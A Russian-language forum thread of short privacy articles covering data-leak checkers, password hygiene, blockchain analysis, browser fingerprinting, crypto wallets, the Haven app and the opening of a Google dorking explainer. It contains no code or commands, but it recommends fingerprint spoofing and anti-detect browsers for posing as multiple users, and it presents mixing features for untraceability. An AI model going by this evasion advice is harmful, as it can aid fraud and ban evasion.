https://i.gyazo.com/3b59b11417a1019e541b44e3259919d2.jpg
Вывод
Газ делает обмен между пользователями максимально честным. Хотя вы ежедневно пользуетесь многими сервисами, не платя никакой комиссии, это не делает ваше взаимодействие прозрачным. Вместо платы, вы позволяете собирать о себе данные, показывать вам персонализированную рекламу, а значит - зарабатывать на ваших действиях. Тем не менее, вы можете не переплачивать за газ. Если вы продаете NFT, то выкладывайте свои токены на маркетплейсах, где не требуется оплата за транзакцию. Ну, а если вы инвестируете, то используйте калькулятор газа, чтобы подобрать подходящую комиссию.
BlackMAST
21.04.2022, 17:08
https://i.gyazo.com/9441842a548138ccbaeefb8d55cc0933.jpg
Вступить в наш чат
Никогда нельзя недооценивать анонимность, ваша безопасность с легкостью может быть подорвана в любой момент. Ежесекундно утекает информация и данные с ваших устройств, а вы ничего не можете с этим поделать. Или можете? В этой статье вы узнаете, как определить, что произошла утечка данных, и что с этим делать.
https://i.gyazo.com/ed64c26530b30b21def4609b6bd9dcaf.jpg
За последние годы многие пользователи смирились с тем, что с их телефонов и компьютеров отправляется большое количество данных в различные сервисы, которые он использует. Такой сбор данных выгоден компаниям для совершенствования своего продукта и создания персонализированной рекламы.
Если это не так сильно беспокоит вас, то следует знать, что помимо компаний, собирающих информацию, ваши данные могут быть украдены и слиты злоумышленниками. И это уже повод начать бить тревогу.
А вы уверены, что вы не стали одной из многих жертв хакеров, чьи пароли стали всеобщим достоянием? Давайте это проверим.
Сервисы для проверки паролей на предмет утечки:
1. Have I been pwned?
https://i.gyazo.com/46741326a468ae3365212e056d95ca56.jpg
Самый популярный сайт для проверки возможных утечек. Have I been pwned - это та же поисковая система, только с реверсивным поиском для проверки вашей почты и паролей в бесчисленной базе данных. Для того, чтобы выяснить попали ли ваши данные в руки злоумышленников, введите email, пароль и система выдаст эту информацию. Данный сервис был создан после одной из самых провокационных утечек, а именно, когда в 2013 году в сеть попали данные свыше 153 миллионов пользователей Adobe.
2. DeHashed
https://i.gyazo.com/41cffade2d36177c9d8aa83e51ffddbc.jpg
Сервис DeHashed создавался не только для простых пользователей, но и для компаний, журналистов, экспертов по безопасности и для всех, кто хочет сразу же узнавать о сливах данных. DeHashed осуществляет поиск по базам украденных персональных данных. С его помощью можно делать запрос по IP-адресам, логинам, паролям, телефонным номером, email адресам и др.
3. Sucuri Security Scanner
https://i.gyazo.com/26b0c0b89b503d6f7c3dc4b3cdc78af6.jpg
Sucuri Security Scanner отличается от двух предыдущих сервисов, так как он ищет не только слитые логины и пароли, но и проверяет целые сайты на возможные хакерские атаки и утечки данных.
4. LeakCheck
https://i.gyazo.com/706385f6152d37fa0d687a9fed7a230a.jpg
С помощью поиска на сайте LeakCheck вы можете узнать, был ли украден ваш пароль от email. Введите почтовый адрес, если произошла утечка, то сервис покажет пароли, которые находятся во всеобщем доступе.
5. SpyCloud
https://i.gyazo.com/d8c369a3afca23a553bf1f84cd99fdba.jpg
SpyCloud имеет огромную базу данных, в которой также может оказаться ваш пароль или другие данные.
6. Firefox Monitor
https://i.gyazo.com/b1d86ea66e5d34052f644d1d6164f96b.jpg
Сервис Firefox Monitor разработан компанией Mozilla и представляет собой поиск по базе данных слитых паролей. Помимо этого, вы можете пройти регистрацию, чтобы первым быть в курсе возможных утечек.
7. GhostProject
https://i.gyazo.com/2eb47da3ab276fced7d3b0813e5a4735.jpg
И закрывает наш топ сервис GhostProject, который может похвастаться многочисленной базой в 1.5 млн слитых данных. Но это еще не все, так как база регулярно пополняется новыми утекшими данными.
Итог
Стоит с осторожностью и внимательностью относится к защите своих данных, ведь информация постоянно копируется, перехватывается и сливается без вашего ведома. О том, как действовать, если вы обнаружили себя в базе утекших данных, и что делать, чтобы этого не повторилось, мы расскажем в следующей части.
BlackMAST
25.04.2022, 20:24
https://i.gyazo.com/2ad61c3bca07f490ad529906f31538c6.jpg
Вступить в наш чат
В первой части мы поделились с вами сервисами, которые помогают определить, попали ли ваши данные в руки хакеров или нет. Если логины и пароли попали в базу с утечками, то сайты это покажут. Но, что же дальше делать с этой информацией и как впредь обезопасить себя от взлома? Об этом расскажем в этой статье.
Как предотвратить утечку данных?
https://i.gyazo.com/f9a2fc1cd9966f0f3f6c68cd95d8a440.jpg
Создайте надежный пароль. В идеале он должен иметь от 20 до 40 символов и храниться только у вас в голове. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение - имена, псевдонимы, клички. Фразы и памятные даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
Используйте разные пароли. Это, пожалуй, один из важных и ключевых моментов. Ведь многие пользователи пренебрегают этим правилом, используя один пароль для всего на свете. Чем это грозит? Если ваш пароль попадет в руки злоумышленника, то он получит доступ ко всем сервисам, что захочет. Поэтому никогда так не делайте, используйте для разных сервисов различные комбинации.
Меняйтесь пароли. Вдобавок к предыдущему пункту, в целях профилактики необходимо регулярно менять пароли, хотя бы раз в год. И, что более важно, не используйте старые пароли, так как вы снижаете вашу степень защиты.
Подключите двухфакторную аутентификацию. Например, пароль + СМС код. Такая комбинация не даст злоумышленникам получить доступ к вашему аккаунту, даже если у них будет пароль для входа. Такая мера значительно уменьшает шанс взлома. Помимо этого, сервисы, работающие с двухфакторной аутентификацией, как правило, оповещают вас, если была попытка входа в ваш профиль.
Не доверяйте ненадежным сервисам. Перед тем, как вводить свои данные на каком-нибудь сайте, внимательно изучите его, если вас мучают сомнения, то не рискуйте. Старайтесь указывать лишь необходимую информацию, нужную для работы сервиса.
Используйте лицензионные антивирусы. Это поможет уберечь ваш ПК от вирусов, тем самым снизив риск утечки личных данных.
Избегайте общественных сетей Wi-Fi, так как данные зачастую сливаются именно таким способом. Взломать и перехватить данные по Wi-Fi не составляет труда даже для новичка в этом деле, что уж тут сказать про профессионала. Но если все-таки вы вынуждены подключиться к общественной сети, то делайте это только с VPN - он переадресует ваши данные и убережет от взлома.
https://i.gyazo.com/047324aefb852b843315ccbb2c8bf4ba.jpg
Что делать, если утечка уже произошла?
Первое, что нужно уяснить, так это то, что нет необходимости впадать в панику, если вы узнали, что ваши данные слили. "Это еще почему?", - спросите вы. А потому, что утечки и сливы происходят в б̶о̶л̶ь̶ш̶о̶м̶ нереально огромном количестве. В открытую базу данных за раз могут попасть данные тысячи человек, а иногда даже миллиарда. Так что вероятность того, что заинтересуются именно вами крайне мала. Скорее всего вы уже 100 раз узнаете об утечке.
1. Если вы нашли себя в базе слитых данных, то вам нужно посмотреть, с какой утечкой это связано. В списке могут отображаться как утечки по сайтам, так и не привязанные к какому-то конкретному ресурсу. Каждый пункт сообщает, когда произошла утечка.
https://i.gyazo.com/45edfb6039ee574db9045b8d41209149.jpg
2. Когда вы выяснили, какие именно данные утекли в сеть, самое время начинать смену не только паролей, но и желательно самих email адресов. Если вы использовали разные пароли для сервисов, то вы сразу сможете понять, где была утечка, и вам не придется везде менять данные. Теперь вы еще больше понимаете, для чего нужны разные пароли для входа на каждый сервис.
Заключение
Если вам кажется, что вас никогда не взломают, и что ваши пароли надежные и не пробиваемые, то это не так. К несчастью, никто не может быть застрахован от утечки данных. Риск, того, что вас взломают, даже если вы будете следовать всем советам, все равно остается. Но это не значит, что нужно упрощать жизнь хакерам, всегда нужно быть начеку и принимать необходимые меры защиты.
BlackMAST
28.04.2022, 19:58
https://i.gyazo.com/13c48519fbe43e6d0f796d4207f1264f.jpg
Вступить в наш чат
Вся информация о цифровых активах навсегда остается в блокчейне, поэтому с помощью специальных инструментов для анализа транзакций, можно задеанонить пользователей.Если вы из вышесказанного ничего не поняли, то давайте разбираться.
Блокчейн - это непрерывная цепочка блоков, где содержатся все записи о сделках. Это основа всех криптовалют.
Блокчейн-анализ -это процесс наблюдения за транзакциями и самими участниками в блокчейне для отслеживания и проведения расследования по криптовалюте.
https://i.gyazo.com/7ab578a5cfb9f2dffa328d2318ef7aaa.jpg
То, что попало в блокчейн остается там навечно
Блокчейн - это длинная цепочка разных информационных блоков, где каждый блок содержит данные о предыдущем. Что это значит? А то, что если транзакция была добавлена в блок, она хранится там отныне всегда, так как ее нельзя удалить. Но хранится в блокчейне информация о транзакциях, а не данные пользователей, поэтому установить связь между ними не так то просто.
Глобальное распределение
В основе блокчейна лежит система глобального распределения хранения данных. Как это понимать? Копия базы блокчейна хранится одновременно на всех устройствах, находящихся в его сети. Учитывая тот факт, что удалить данные из блокчейна не представляется возможным, то для того, чтобы избавиться от цифрового следа вам придется их удалить сразу на всех устройствах по всему миру, что на практике нереально.
Цифровой след
Каждая транзакция в блокчейне имеет свой адрес - TxID. С его помощью любой желающий может посмотреть сумму, откуда активы пришли и куда ушли. Узнать сохраненную информацию в блокчейне можно тут.
Расследования
Программное обеспечение для анализа блокчейнов играет важную роль в расследованиях, связанных с криптовалютами. Это дает возможность правоохранительным органам отслеживать тразакции и определять мошенников. Например, преступник использует некий сервис для конвертации криптоактивов в фиатные деньги. С помощью инструментов для анализа блокчейна можно определить используемый криптосервис, и если в нем реализована строгая политика KYC, это даст возможность идентифицировать реального преступника.
Компании, занимающиеся блокчейн-анализом, предоставляют также мощные инструменты визуализации для вручную управляемых исследований и реализуют различные алгоритмы кластеризации для идентификации криптосервисов.
Инструменты блокчейн-анализа
Инструменты для блокчейн-анализа - это способы для отслеживания транзакций и проведения расследований. Их задача - объединить транзакции в блокчейне и людей, совершавших эти переводы.
Основные функции инструментов для блокчейн-анализа:
Классификация адресов - одним из основных применений программного обеспечения является соотнесение блокчейн-адресов с реальными личностями. Для их определения, инструменты анализа блокчейнов используют такие методы, как алгоритмы кластеризации, веб-скрейпинг, мониторинг баз данных о мошенничествах и пылевые атаки.
Мониторинг транзакций и анализ рисков - блокчейн-анализ позволяет контролировать каждую транзакцию и оценивать риски исходя из того, откуда идут средства и какая история кошельков отправителя или получателя. Анализ рисков основывается на множестве параметров, таких как сумма транзакции, происхождение средств и история денежных потоков.
Инструменты для исследований и анализа — предоставляют средства визуализации для составления графов транзакций с целью обнаружения связей между ними.
̶А̶н̶о̶н̶и̶м̶н̶о̶с̶т̶ь̶
Все убеждены, что блокчейн и криптовалюты полностью анонимны. Но достаточно ли, чтобы скрыть преступление? В целом система действительно является анонимной и не имеет связей с лицами реального мира. Но в процессе использования криптовалюты сами пользователи раскрывают себя, связывая личность с адресом. "Каким образом?", - cпросите вы. Достаточно подтвердить свою личность или же указать кошелек на другой бирже и вся информация сохранится в базах данных.
С первого взгляда криптовалюта кажется идеальным решением для мошенников, но выходит, что система достаточно прозрачна, чтобы использовать ее в преступных целях.
Если кто-то совершил противозаконное действие, то его след не исчезнет из блокчейна, даже если это было очень давно. Да, вы можете отрицать, что система не идеальна, и что невозможно задеанонимизировать каждого мошенника. Отчасти это так, но, как мы знаем, алгоритмы постоянно совершенствуются, и поэтому нельзя ни в чем быть уверенным.
BlackMAST
02.05.2022, 18:05
https://i.gyazo.com/27edf476a16a4e3eba8a8ed2f4404a4a.jpg
Вступить в наш чат
Каждому пользователю в интернете присваивается уникальный идентификатор или отпечаток пальца. Он содержит много информации о настройках и функциях браузера пользователя и используется для идентификации пользователя. В отпечаток входят десятки разных параметров — от языка, который вы используете, и временной зоны, в которой находитесь, до списка расширений и версии вашего браузера. Сюда же может входить информация об операционной системе, об объеме оперативной памяти, разрешении экрана устройства, параметрах шрифтов и многом другом. Эта комбинация данных называется fingerprint, а сбор этих данных называется фингерпринтингом.
https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpgВиды отпечатков
User agent - это элемент браузера, отражающий набор информации об устройстве. Включает браузер, программное обеспечение, устройство и многое другое;
Язык браузера;
IP и данные провайдера;
Canvas;
Cookie;
Часовой пояс;
Расширения;
Шрифт;
Плагины и их характеристика.
Cуществует более 50 параметров.
Цифровой отпечаток браузера представляет собой 32-битное число шестнадцатеричной системы. Полученный отпечаток браузера позволяет отслеживать пользователей в сети Интернет с точностью до 94%.
Важно: Отпечатки, как и User agent, в совокупности ведут лишь к уникализации, но никак не к деанонону пользователя.
Сookies и fingerprints - в чем разница
Файлы cookie являются неотъемлемой частью многих онлайн-транзакций. Владельцы сайтов считаю их одним из основных инструментов, используемых для отслеживания активности клиентов. Но этот метод уже является устарелым и малоэффективным.
На это есть несколько причин. Во-первых, любой пользователь может отклонить файлы. Во-вторых, стоит включить "режим инкогнито" и ваше присутствие станет на сайте незаметными. Файлы cookie отправляют данные не только владельцу ресурса, но и самому пользователю, поэтому всегда есть возможность оградить себя от них.
Но с фингерпринтами все стоит иначе. Этот метод анализирует информацию, отправляемую браузером на сайт, который посещает пользователь. Оцениваются несколько типов данных, таких как языковые настройки, шрифты, часовой пояс, разрешение экрана, установленные плагины и версии программного обеспечения. Все вместе это дает цельную картину о конкретном человеке.
Важно понимать, что смена IP-адреса не защищает ваш фингерпринт.
Опасности цифровых отпечатков
Деанон - причина номер один, из-за которой пользователи должны быть осторожны. Система помечает ваш компьютер специальной цифровой меткой в виде хэш-суммы, снятой по специальному алгоритму без вашего ведома. Таким образом, пользователь может быть деанонимизирован.
Fingerprints как регенератор cookies. Многие веб-сайты используют так называемые Flash LSO super cookies, которые позволяют восстанавливать куки, даже при их удалении. Отпечатки пальцев браузера могут не только восстанавливать всю библиотеку файлов cookie, но и отслеживать пользователей по их основной сетевой информации. В этом случае процесс очистки системы cookie становится бессмысленным и сайт все равно распознает клиента.
В следующих статьях вы узнаете:
Как понять, что сайт снимает фингерпринт;
Как изменить свой фингерпринт;
Как проверить свой отпечаток браузера.
BlackMAST
05.05.2022, 19:38
https://i.gyazo.com/495cc2d636cdce890cc8d794bb6da122.jpg
Вступить в наш чат
Ранее мы рассказали, что такое фингерпринт. В этой статье разберем для чего он используется, как сайты снимают отпечаток браузера и законно ли то.
https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpg
Для чего используется фингерпринт
Сайты собирают цифровые отпечатки своих посетителей, чтобы:
Защита от мошенничества и спуфинга. Например, если система видит по отпечатку, что пользователь посещает сайт из непривычного места или незнакомого устройства, она может заподозрить, что аккаунт был взломан. В результате ваша учетная запись будет заморожена, пока вы лично не восстановите доступ.
Бороться с ботами. Например, если кто-то попытается создать несколько учетных записей из одного и того же браузера, в какой-то момент соцсети его забанят.
Показывать рекламу. Данные фингерпринта: информация о местоположении, языке и т.д. может использоваться сайтом для показа рекламы или обмена с другими сайтами. К сожалению, эта информация может сыграть против вас.
Как понять, что сайт снимает фингерпринт
Фингерпринтингом занимаются все крупные сайты, рекламные площадки, поисковики и соцсети. Они хотят собирать и знать как можно больше информации о своих пользователях.
Это двухуровневый процесс, который работает как на стороне сервера, так и на стороне пользователя.
На стороне сервера
Логи доступа к сайту
В этом случае речь идет о сборе данных, отправляемых браузером. Как минимум это:
Запрошенный протокол.
Запрошенный URL.
Ваш IP.
Referer.
User-agent.
Заголовки
Веб-серверы получают их из вашего браузера. Заголовок важен для того, чтобы запрашиваемый сайт работал в вашем браузере.
Например, информация в заголовке позволяет сайту узнать, используете ли вы ПК или мобильное устройство. В последнем случае вы будете перенаправлены на версию, оптимизированную для мобильных устройств. К сожалению, эти же данные попадут в ваш отпечаток.
Куки
Они играют очень важную роль в логировании. Так, вам обычно нужно решить, позволить ли вашему браузеру обрабатывать файлы cookie или полностью их удалять.
В первом случае сервер получает просто огромное количество данных о вашем устройстве и предпочтениях. Даже если вы не принимаете файлы cookie, сайт все равно будет собирать некоторые данные о вашем браузере.
Canvas Fingerprinting
В этом методе используется элемент холста HTML5, который WebGL также использует для рендеринга 2D- и 3D-графики в браузере.
Этот метод обычно заставляет браузер "принудительно" обрабатывать графическое содержимое, содержащее изображения, текст или и то, и другое. Этот процесс выполняется в фоновом режиме и невидим для вас.
Когда процесс завершен, canvas fingerprinting преобразует графику в хэш, что делает его уникальным идентификатором, упомянутым выше.
Таким образом, возможно получить следующую информацию о вашем устройстве:
Графический адаптер;
Драйвер графического адаптера;
Процессор (если нет выделенного графического чипа);
Установленные шрифты.
Логирование на стороне пользователя
Здесь подразумевается, что ваш браузер передает большое количество данных с помощью:
Adobe Flash и JavaScript
Когда JavaScript включен, данные о ваших плагинах и спецификациях железа передаются третьим лицам.
Если установлен и включен Flash, он предоставит еще больше данных, такие как:
Ваш часовой пояс;
Версию ОС;
Разрешение экрана;
Полный список установленных шрифтов.
Законно ли собирать фингерпринты
В отличие от файлов cookie, сбор которых без согласия пользователя невозможен, для фингерпринтов такого требования пока нет. Поэтому ограничений на сбор отпечатка браузера нет.
Читайте в следующей статье, возможно ли изменить свой отпечаток браузера и как это сделать.
BlackMAST
16.05.2022, 16:49
Как изменить свой фингерпринт
https://i.gyazo.com/3f3eba5d30206b823a9825ab884ea0b5.jpg
Вступить в наш чат
Это третья часть серии статей про отпечатки браузера. Из прошлых двух статей мы выяснили:
Фингерпринт – это система слежения за пользователями в интернете, основанная на сведениях из браузера и ПК.
Отпечатки собирают большой объем информации из настроек и браузера, и компьютера в целом. Это языковые параметры, часовой пояс, разрешение экрана, наличие конкретных плагинов и многое другое.
Если браузер помечен отпечатками, удаление cookies даст ограниченный эффект. Более эффективно полностью изменить настройки браузера и системы. Настройки не должны быть слишком уникальными, поскольку это приведет не к уменьшению, а к увеличению узнаваемости браузера.
Полностью защититься от фингерпринтинга нельзя, но можно снизить уникальность.
Читать статьи полностью:
1 часть
2 часть
https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpg
Кому нужно менять свой фингерпринт
Фингерпринт необходимо менять:
Арбитражникам, маркетологам и другим диджитал-специалистам, которые пользуются несколькими аккаунтами. Меняя свой фингерпринт, они могут выдавать себя за других пользователей.
Всем, кто связан с финансовым бизнесом: криптовалюты, беттинг и др. Точно так же - выдавать себя за разных пользователей с помощью разных фингерпринтов.
Всем, кто хочет защитить свои данные в интернете.
Как изменить свой цифровой отпечаток
вручную
Для этого вам нужно заменить или отключить большую часть данных, из которых состоит ваш отпечаток пальца. Например:
Удалите cookie перед началом новой сессии;
Отключите Flash и JavaScript. Если их отключить, то сайт не сможет проанализировать некоторые данные, из которых состоит цифровой отпечаток, например шрифты;
Установите другой язык операционной системы;
Измените разрешение экрана устройства;
Установите другой язык браузера и измените масштаб веб-страницы;
Отключите Canvas. Например, с помощью CanvasBlocker;
Измените часовой пояс устройства.
Преимущество этого метода в том, что он бесплатный и не требует дополнительного программного обеспечения, но вам нужно будет постоянно тратить время на выполнение одних и тех же действий. Кроме того, сайты регулярно увеличивают объемы анализируемых данных, а значит вы не в состоянии предусмотреть все нюансы, потому фингерпринт все равно смогут распознать.
Веб-расширения
На рынке уже не первый год есть продукты, которые помогают замаскировать реальный цифровой отпечаток. Расширения помогают повысить уникальность отпечатка браузера.
Вот что можно рекомендовать:
Chameleon - модификация значений user-agent. Можно установить периодичность "раз в 10 минут", например.
Avast Antitrack устраняет трекеры и скрывает фингерпринты, но является платным.
Trace - защита от разных вариантов сбора отпечатков.
User-Agent Switcher - делает примерно то же, что и Chameleon.
Disconnect.me также обещает полную защиту от слежки в интернете.
Canvasblocker - защита от сбора цифровых отпечатков с canvas.
VPN
VPN - это самый простой способ обойти интернет запреты в некоторых странах, и защитить себя в интернете. Он изменяет ваш IP, тем самым маскирую вашу личность, но не скрывает данные о вашем браузере и его цифровом отпечатке. Также он не влияет на cookie.
По этой причине VPN недостаточно для арбитража трафика и работы с криптовалютой. Его нужно использовать в тандеме с другими методами.
Почитайте нашу статью о том, как выбрать VPN.
Антидетект браузеры
Это специальные программы, способные замаскировать фингерпринты. Вы можете настроить свой собственный отпечаток пальца или получить готовый из браузера. Все популярные антидетект браузеры хорошо справляются с этим, поэтому пользователи чаще, как правило, обращают внимание на стоимость, удобство и дополнительные функции. Стоит понимать, что полностью защититься от фингерпринтинга невозможно. Однако, объем информации, собираемой сторонними сервисами, может быть уменьшен.
Браузер Firefox
Этот браузер хорошо маскирует данные пользователей. Недавно разработчики защитили пользователей Firefox от стороннего сбора отпечатков пальцев. Но вы можете повысить уровень защиты еще больше следующим способом:
Для этого требуется зайти в настройки браузера, путем ввода в адресной строке «about:config». Затем выбираем и меняем следующие опции:
webgl.disabled — выбираем «true».
geo.enabled — выбираем «false».
privacy.resistFingerprinting — выбираем «true». Эта опция дает базовый уровень защиты против сбора отпечатков браузера. Но наиболее эффективна она при выборе и других опций из списка.
privacy.firstparty.isolate — меняем на «true». Эта опция позволяет блокировать cookies от first-party доменов.
media.peerconnection.enabled — необязательная опция, но, если вы работаете с VPN, ее стоит выбрать. Она дает возможность предотвратить утечку WebRTC и демонстрацию своего IP.
Также можно выделить и другие браузеры как AdsPower, Multilogin и Linken Sphere, которые подменяют данные пользователя и минимизируют след в интернете.
Выделенные серверы
Использование дедиков (от слова dedicated server) до сих пор считается одним из самым эффективных способов сохранения анонимности. Дедик - это физически отдельная машина, с которой никакие данные не передаются на вашу основную или рабочую.
Плюсы: Настройка HTTP/SOCKS-прокси или SSH/VPN-соединения на выбор; Контроль истории запросов; Спасает при атаке через Flash, Java, JavaScript, если использовать удаленный браузер;
Минусы: Относительно высокая стоимость;
Необходимы технические знания для правильной настройки.
Такие виртуальные компьютеры являются новыми и чистыми для интернета, а их популярность и эффективность во многом обусловлены их круглосуточной работой и отсутствием распространения какой-либо информации о конечных пользователях или характеристиках их компьютеров.
Узнайте в следующей статье как проверить свой отпечаток браузера.
https://telegra.ph/Kak-izmenit-svoj-fingerprint-04-24
BlackMAST
16.05.2022, 16:50
https://i.gyazo.com/a6c8a51f00c7499140885ef35328963d.jpg
Вступить в наш чат
Криптовалюта все больше и больше входит в повседневную жизнь человека. На сегодняшний день почти все услуги можно оплатить криптовалютой. Криптовалюта, в отличие от обычный денег, не хранится в реальном или виртуальном кошельке, а только в блокчейн.
В этой статье мы подробно ознакомились с криптокошельками, рассмотрели их различные виды и сравнили между собой. Коротко напомним о том, какие бывают виды криптокошельков.
Типы кошельков
Все криптокошельки можно объединить в несколько основных видов:
кошельки для ПК;
для мобильных устройств;
аппаратные;
бумажные кошельки;
онлайн-кошельки.
Несмотря на многообразие видов, крайне сложно выбрать надежный и безопасный криптокошелек, но мы вам с этим поможем.
Зачем всё это надо?
Нынешняя финансовая система без конца диктует, установленные правила, как ВАМ можно, а как нельзя потратить ВАШИ собственные деньги. Поскольку биткоин называют "устойчивый к цензуре", это дает своего рода гарантии, что ни правительство, ни ваш банк не смогут ограничить ваши действия.
Как лучше хранить крипту?
Какой криптокошелек лучше выбрать? Это зависит от различных условий. Самое главное - это безопасность и надежность, проверенная временем. Ну и, конечно же, ваши потребности. Например, если вам нужно хранить много денег, рекомендуется купить аппаратный кошелек, а если вы торгуете на бирже, то можно хранить криптовалюту прямо на ней, не платя комиссию за перевод.
https://i.gyazo.com/af4e6bdbea45951a63e1b0c7be66783e.jpg
Топ-5 криптокошельков для биткоина
1. Electrum
Electrum - один из самых популярных кошельков для BTC.
Кошелек имеет открытый исходный код и позволяет совершать массовые платежи, используя автономное, холодное хранение. Обладает двумя уровнями шифрования.
Electrum классифицируется как легкий кошелек. Нет необходимости загружать сеть блокчейна, а сама установка будет завершена за считанные минуты.
Electrum - один из первых криптовалютных кошельков, история которого насчитывает более 10 лет. Этот проект имеет хорошую репутацию и уже много лет является одним из лидирующих на рынке криптовалют.
Он работает как в десктопной версии, так и в мобильном приложении. Electrum совместим с системами Windows, Linux, OSX и Android.
https://i.gyazo.com/bc7fee8a91fd452e5b608cc1fd1ad649.jpg
2. Exodus
Exodus – удобный мобильный кошелек с простым функционалом.
Exodus поддерживает функцию стейкинга и обмена криптовалют, а также хранение более ста различных криптовалют.
Из плюсов можно выделить простоту и удобство в использовании, понятный интерфейс, а также встроенный обмен криптовалюты и синхронизацию кошельков на нескольких устройствах.
Мобильный кошелек имеет ограниченный функционал по сравнению с десктопным клиентом, но для новичков есть все необходимые функции.
Exodus имеет поддержку 24/7.
https://i.gyazo.com/30af9e0084ea1c2280e704cb2f9d978b.jpg
3. Samourai
Samourai - это кошелек BTC для пользователей Android с упором на конфиденциальность. Созданный в 2015 году, Samurai Wallet является одним из первых клиентов, поддерживающих обновления сети биткойнов Segregated Witness. Кроме того, Samurai имеет множество дополнительных функций:
Модуль Dojo, который позволяет развернуть полный узел plug-n-play;
STONEWALL - опция, удаляющая цифровой след из метаданных и защищающая пользователя от деанонимизации;
PayNym - маскирует адрес от всех, кроме отправителя и получателя;
Scrambled PIN - защищает захват экрана шпионскими программами;
Удаленные SMS - позволяют стереть и восстановить учетную запись, если ваш телефон был потерян или украден;
Whirlpool или водоворот, который разрывает связь между входом и выходом транзакции, что затрудняет отслеживание.
Samurai готов постоять за вашу приватность. Поскольку функция хранилища полностью отсутствует, вы всегда можете управлять своими закрытыми ключами. Для начала работы с Samourai вам не нужно вводить свой адрес электронной почты или подтверждать свою личность, просто установите его.
https://i.gyazo.com/ddbd196235e9a6b0310ad14cf831b0c1.png
4. Wasabi
Wasabi - проверенный временем десктопный кошелек.
Он имеет открытый исходный код и использует CoinJoin (специальный тип биткоин-транзакций, при котором несколько пользователей объединяются, чтобы соединить свои монеты в одну транзакцию). Этот протокол значительно повышает анонимность держателей монет. Эта концепция существует с момента появления биткоина, но лишь немногие криптокошельки ее реализовали.
Особенностью Wasabi является интеграция с холодными аппаратными кошельками, а также с сетью Tor, что гарантирует безопасность и анонимность.
Васаби доступен на платформах Windows, Mac OS и Linux.
https://i.gyazo.com/480229c7866557a522fb3f2c5969dd72.jpg
5. Cake Wallet
Cake Wallet - один из лучших кошельков для пользователей iOS. Он позиционирует себя в качестве кошелька №1 в сфере безопасности хранения средств. Только владелец кошелька отвечает за личные ключи и может ими управлять, таким образом, Cake безопаснее, чем большинство настольных кошельков или веб-кошельков.
Имеет открытый исходный код;
Поддерживает нескольких валют XMR, BTC и LTC;
Встроенный обменник. В приложении можно конвертировать ADA, ВСН, DAI, EOS, USDT, TRX и другие монеты;
Возможность купить криптовалюту в самом приложения;
Поддержка нескольких кошельков и учетных записей в одном приложении;
Возможность создания резервных копий кошелька локально или в облаке.
BlackMAST
19.05.2022, 18:29
https://i.gyazo.com/ad645a5ebf0de21eba5d0e15fc772418.jpg
Вступить в наш чат
Наверняка у каждого из вас есть как минимум один ненужный телефон, который пылится на полке. Но вы будете удивлены, узнав, что ему можно найти очень хорошее применение. Превратите его в удаленную систему наблюдения с детектором движения и возможностью записи происходящего.
https://i.gyazo.com/020602b860cff8a4230a7e3a00dfe54c.jpg
Haven
Как же это сделать? Сегодня мы расскажем про одно очень необычное приложение, которое предназначено как раз для это цели - Haven. Его создатель - Эдвард Сноуден, известный IT-специалист и спецагент.
Это приложение на базе Android использует встроенные сенсоры для создания системы наблюдения и защиты личного пространства. Haven превращает любой Android-телефон в детектор движения, звука, вибрации и освещённости, предупреждая о нежданных гостях.
Haven применяет сквозное шифрование для защиты данных. В отличие от похожих платных приложений, Haven не использует сомнительные облачные хранилища, а все уведомления отправляет через Signal и Tor.
Установка
Так как Haven доступно только для пользователей Android, любителям iOS рекомендуют приобрести дешевый Android-смартфон и использовать его как шпионское устройство, получая уведомления на свой iPhone.
Скачать приложение можно тут.
Когда вы запустите его, вам будет предложено установить границу шума и движения, отрегулировав их в зависимости от исходящих звуков. Например, исключите срабатывание на стиральную машинку или работающий холодильник. В качестве сенсора движения используется фронтальная или задняя камера. Соответственно, телефон можно спрятать в укромном месте, так чтобы камера записывала происходящее.
https://i.gyazo.com/4a7c2eab72bdc2b6b25f7d04de7b2d77.jpg
Приложение Heaven также предлагает связать ваше устройство, добавив номер для получения мгновенных оповещений, которые будут поступать по защищённым каналам. Доступ к логам предоставляется в удалённом режиме через Tor, то есть можно почти в реальном времени смотреть и слышать, что происходит в доме. В логах сохраняются данные со всех сенсоров, фотографии и звуковые файлы. Любую информацию можно посмотреть, удалить или быстро обнародовать через Signal, WhatsApp, Gmail, Google Drive или другой файлохостинг.
Приложение использует ниже указанные сенсоры, а затем записывает в журнал событий на устройстве:
Акселерометр: физическое перемещение самого телефона и вибрация;
Камера: движение в поле зрения фронтальной или задней камеры телефона;
Микрофон: посторонние звуки поблизости;
Освещение: изменения в освещении, определяемые фоточувствительным сенсором;
Питание: определяет потерю питания или отсоединение телефона от сети питания.
Итог
Это приложение станет незаменимым для параноиков, в хорошем смысле этого слова и просто для людей, которые ценят безопасность. Haven поможет выявить проникновение, будь то в ваш дом или номер в отеле и остановить злоумышленника. Без подобной системы охраны нельзя быть уверенным, что в ваше отсутствие вам ничего не грозит. Сам Эдвард Сноуден выразился:
«Haven не просто прикрывает вас, она дает душевное спокойствие».
BlackMAST
24.05.2022, 00:49
Вступить в наш чатЧто такое Google Dork?
Google Dork, также известный как Google Dorking или Google Hacking, стал ценным ресурсом для исследователей безопасности. А вот для обычного человека Google - это всего лишь поисковый сервис для картинок, видео, новостей. Но на сегодняшний день Google является одним из самых полезных инструментов для взлома и кражи информации, который используют хакеры.
Google Dork - это метод взлома компьютера, использующий приложения Google, такие как Google Search. Делается это очень просто через дыры в поисковом запросе. Иначе говоря, Google Dork - это использование возможностей собственной поисковой системы Google для поиска уязвимых приложений и серверов.
Как работает Dork?
Например, вы решили купить камеру наблюдения для того чтобы смотреть с телефона, что происходит дома, пока вы на работе. Все, что вам нужно сделать - это загрузить приложение на телефон или планшет, и вы можете получить изображение с камеры видеонаблюдения в реальном времени. Однако, человек, который обладает знаниями, может перехватить запись с камеры с помощью одного лишь гугла. Как это возможно? К сожалению или к счастью, Google не может защитить устройства в интернете, в особенности те, которые работают на серверах HTTP или HTTPS. В результате, в поисковик попадают все те вещи, которые там быть не должны - данные от учетных записей пользователей, списки адресов email, открытые веб-камеры и многое другое.
